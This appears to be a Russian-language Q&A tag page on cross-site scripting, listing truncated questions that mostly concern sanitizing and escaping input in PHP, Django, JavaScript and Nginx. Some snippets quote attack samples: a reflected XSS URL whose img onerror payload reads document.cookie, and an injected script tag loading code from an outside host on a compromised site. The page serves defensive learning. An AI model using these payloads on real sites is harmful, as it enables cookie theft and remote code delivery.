Описание тега xss
Межсайтовый скриптинг (XSS) - это тип уязвимости компьютерной безопасности, обычно обнаруживаемый в веб-приложениях, который позволяет злоумышленникам внедрять клиентский скрипт в веб-страницы, просматриваемые другими пользователями. Злоумышленники могут использовать уязвимость межсайтового скриптинга для обхода средств контроля доступа, таких как одна и та же политика происхождения.
0
ответов
Почему Naxsi (Nginx) не применяет основные правила? CentOS 7. NGINX 1.12.2
Я перекомпилировал последнюю версию naxis с nginx в соответствии с несколькими уроками. Вот конфигурация nginx: nginx version: nginx/1.12.2 built by gcc 4.8.5 20150623 (Red Hat 4.8.5-16) (GCC) built with OpenSSL 1.0.2k-fips 26 Jan 2017 TLS SNI suppo…
04 авг '18 в 14:40
1
ответ
xss attack - для исправления требуется больше информации
Может кто-нибудь объяснить, как работает ниже уязвимость XSS (что делает), а также лучший способ исправить (с помощью PHP) https://www.domain.com/page.php?tid=11%22%3E%3Cimg%20src=x%20onerror=alert%28document.cookie%29%3E&id;=82
13 авг '15 в 13:41
2
ответа
Насколько рискованно это воздействие xss и как сделать его более безопасным
Прежде чем описывать проблему, я дам вам контекст, почему я разрешаю эту экспозицию xss. контекст Я полагаюсь на внешний API. Одним из полей, возвращаемых API, является html (уже закодировано). Я могу расшифровать его и показать на странице, не бесп…
11 янв '16 в 17:38
2
ответа
Является ли это дезинфицирующее средство уязвимым для XSS?
Чтобы иметь простой и безопасный редактор для текстовых полей приложения django, у меня есть этот фрагмент для очистки входного HTML в коде django: from bs4 import BeautifulSoup def sanitize_html(value): tag_whitelist = ['img','b','strong','blockquo…
04 сен '15 в 08:00
1
ответ
Что делают htmlentities с ENT_QUOTES и UTF-8?
Я всегда использовал простой htmlentities($_POST['string']); очистить данные для любых атак XSS. Недавно я видел, как люди используют это: htmlentities($_POST['string'], ENT_QUOTES, 'UTF-8'); В чем преимущество или цель использования этого по сравне…
01 июн '13 в 07:19
4
ответа
Использование библиотеки MS Anti XSS для очистки HTML
В целях предотвращения XSS-атак я обновляю страницу, на которой у нас есть текстовое поле, которое принимает HTML, сохраняет его в базе данных, а затем извлекает и отображает его. Насколько я понимаю, я могу дезинфицировать HTML, используя AntiXSS.G…
08 янв '10 в 23:33
2
ответа
XSS предотвращение для параметров, передаваемых в файл кода JS
У меня есть следующий поток: URL с параметрами запроса, который запускает некоторую логику на стороне сервера, а затем генерирует с помощью шаблонизатора заглушку HTML-страницу с Включен файл JavaScript, который выполняет основную логику. <script…
04 авг '16 в 09:00
6
ответов
Очень сложно найти вредоносную строку JS: </ title><script src = http: //hgbyju.com/r.php></ script>
Я работаю над сайтом http://palacechemicals.co.uk/ который каким-то образом заразился вредоносной (но неопасной) строкой JavaScript: </title><script src=http://hgbyju.com/r.php ></script> на 251-й линии. URL-адрес, который пытается…
20 апр '12 в 12:27
0
ответов
Обнаружение (не выход) уязвимостей XSS из строки html или уценки?
У меня есть клиентский редактор Markdown/HTML, который отправляет текст уценки на сервер, и мне нужно, чтобы он жаловался (т. Е. 400, ошибка проверки), если отправленная текстовая строка клиента имеет XSS-уязвимости. Учитывая строку (либо Markdown, …
01 окт '18 в 05:47
1
ответ
Как выполнить простую XSS-атаку на основе DOM
Вот мой index.html (уязвимый): <!DOCTYPE html> <html> <head> <link rel="stylesheet" href="style.css"> <script src="script.js"></script> </head> <script> document.write("<form><select>"); do…
20 ноя '13 в 01:48
3
ответа
XSS безопасность HTML-тегов без атрибутов
Являются ли HTML-теги XSS безопасными, если у них нет атрибутов?
26 май '10 в 10:35
0
ответов
Антисамия не кодирует @
Я использую антисамию 1.5, чтобы предотвратить XSS. Я видел проблему, когда вход был firstname,lastname<name@mail.com> or firstname,lastname<name@mail.com testing> Результат после антисемийного сканирования одинаков для обоих случаев выш…
25 апр '18 в 18:41
4
ответа
Безопасность XSS - удалите все скрипты, разрешите все остальное
На нашей веб-странице мы показываем сторонний HTML-код, который должен правильно отображать большинство вещей, включая ссылки и изображения. Мы в основном хотим продезинфицировать против всех сценариев, т.е. <script>...</script> Но все м…
15 май '12 в 21:51
2
ответа
xssAPI не может быть решена ошибка в моем компоненте JQ CQ5
Ниже приведен фрагмент кода: <%@taglib prefix="cq" uri="http://www.day.com/taglibs/cq/1.0" %> <%@taglib prefix="sling" uri="http://sling.apache.org/taglibs/sling/1.0" %> <sling:defineObjects /> <cq:defineObjects /> <label …
25 июн '14 в 13:22
1
ответ
Веб-API и токен Anitforgery с Angularjs
Чтобы избежать xss-атаки, MVC генерирует некоторый токен против подделки. Но в нашем проекте у нас есть Angularjs с веб-API. Моя потребность Нужен ли токен подделки для предотвращения xss-атаки в проекте Angularjs с веб-интерфейсом? Если нам нужно, …
27 окт '16 в 12:07
1
ответ
Гарантирует ли filter_var, что $_SERVER["QUERY_STRING"] будет защищен от инъекции XSS?
############################################ ## Connection Creation for Both Databases ## ############################################ //Create Connection for Pokemon Test Database $PokemonConnection=mysqli_connect("URL","username","password","datab…
19 май '14 в 19:21
1
ответ
Что означает "очистка JavaScript не спасает вас от innerHTML"?
Я изучаю xss предотвращение через этот ppt: http://stash.github.io/empirejs-2014/, и у меня есть вопрос на этой странице. Там написано: "Очистка JavaScript не спасет вас от innerHTML", и я попробовал простой тест, подобный следующему: <!doctype h…
31 июл '15 в 02:46
3
ответа
Как санировать параметры для использования в JavaScript?
У меня есть следующий код PHP: <?php $redirect_lp = $_GET['lp']; ?> <script> setTimeout(function(){ window.location.href = "<?php echo $redirect_lp; ?>"; }, 10) </script> как мне продезинфицировать $redirect_lp? Я знаю, что э…
06 янв '16 в 08:57
4
ответа
Как правильно экранировать html формы ввода значений по умолчанию в php?
Учитывая следующие два фрагмента HTML / PHP: <input type="text" name="firstname" value="<?php echo $_POST['firstname']; ?>" /> а также <textarea name="content"><?php echo $_POST['content']; ?></textarea> какую кодировку…
06 июн '11 в 07:56
1
ответ
Как настроить Swagger в отдельном домене для Azure Mobile (для решения проблемы безопасности)
Эта вики-ссылка содержит следующие рекомендации по Swagger ПРИМЕЧАНИЕ. Версия Microsoft.Azure.Mobile.Server.Swagger версии 0.3.157.1 зависит от версии библиотеки JavaScript swagger-ui, в которой имеется уязвимость системы безопасности. См. https://n…
31 дек '16 в 02:46